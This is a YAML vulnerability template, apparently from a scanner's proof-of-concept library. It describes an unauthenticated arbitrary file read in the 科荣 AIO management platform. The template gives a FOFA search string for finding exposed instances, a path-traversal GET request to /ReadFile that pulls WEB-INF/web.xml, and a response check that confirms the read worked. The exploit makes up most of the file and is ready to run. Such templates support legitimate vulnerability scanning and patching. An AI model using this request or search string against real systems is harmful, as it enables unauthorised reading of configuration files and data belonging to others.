product: 科荣企业运营管理平台
vName: 科荣 AIO ReadFile任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 科荣AIO管理系统存在文件读取漏洞，攻击者可以通过未经授权的访问，构造恶意请求并读取系统中的敏感文件。该漏洞可能导致泄露配置信息、用户数据等敏感信息，为确保系统安全，建议尽快修复漏洞，实施有效的输入验证和访问控制机制。
version: ''
note: ''
search:
  FOFA: body="changeAccount('8000')"
protocol: http
link: https://blog.csdn.net/qq_56698744/article/details/134599405
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /ReadFile?tempFile=path&path=../../website/WEB-INF/&fileName=web.xml
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - <web-app
            logic: and